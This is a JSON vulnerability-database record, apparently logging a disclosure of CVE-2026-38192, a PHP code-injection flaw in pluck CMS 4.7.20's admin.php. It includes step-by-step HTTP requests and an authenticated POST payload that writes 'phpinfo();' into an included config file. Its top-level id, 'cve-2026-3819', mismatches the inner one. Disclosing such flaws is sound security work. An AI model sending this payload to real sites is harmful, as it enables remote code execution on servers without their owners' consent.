{"vulnerability": "cve-2026-3819", "sightings": [{"uuid": "3d225f80-b5df-4b11-bfd9-c4680abc3074", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-38192", "type": "seen", "source": "https://gist.github.com/Echore61/a64f2a2ad7373ad91afee2a50316fecf", "content": "[CVE ID}\nCVE-2026-38192\n[PRODUCT]\npluck-CMS-4.7.20\n[VERSION]\npluck-CMS-4.7.20\n[PROBLEM TYPE]\ncode-injection\n[DESCRIPTION]\nIn admin.php, the module_addtosite function iterates through the entire $_POST array, splits the user-controllable parameter names using explode('|', ...) and directly concatenates them into data/settings/themes//moduleconf.php. This file will subsequently be included in the backend page and frontend theme_area() rendering process. Since the parameter names have not undergone whitelist verification and security escaping, attackers can contaminate executable PHP files, leading to code injection vulnerabilities.\nProject address\uff1ahttps://github.com/pluck-cms/pluck/\n\nReproduction environment\uff1apluck-CMS-4.7.20 Apache2.4.39 PHP7.3.4 MySQL8.0.12\n1\u3001First, install a brand-new environment.\n2\u3001Access the \"/login.php\" page, log in to the administrator's account, and after successful login, note down the current Cookie as follows: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\n\nGET /admin.php?action=start HTTP/1.1\nHost: 10.142.77.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://10.142.77.31/login.php\nConnection: close\nCookie: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\n\n3\u3001Send a POST data packet, with the injected code being \"phpinfo();\"\n\nPOST /admin.php?action=module_addtosite HTTP/1.1\nHost: 10.142.77.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://10.142.77.31/admin.php?action=start\nConnection: close\nCookie: login_history=1%7Cd1cca638fd415f8faca3e58d5c75832d; PHPSESSID=065b37ga6e7u45e6bocd02if0j\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 40\n\nsave=1%3Bphpinfo%28%29%3B%2F%2F%7Cm%3D11\n\n4\u3001Access the root directory of the website, and it will redirect to the homepage. It is found that the injected code has been executed.\n\nlink for reference:https://github.com/Echore61/pluck-CMS-4.7.20-code-injection-vulnerability", "creation_timestamp": "2026-05-25T08:35:08.000000Z"}]}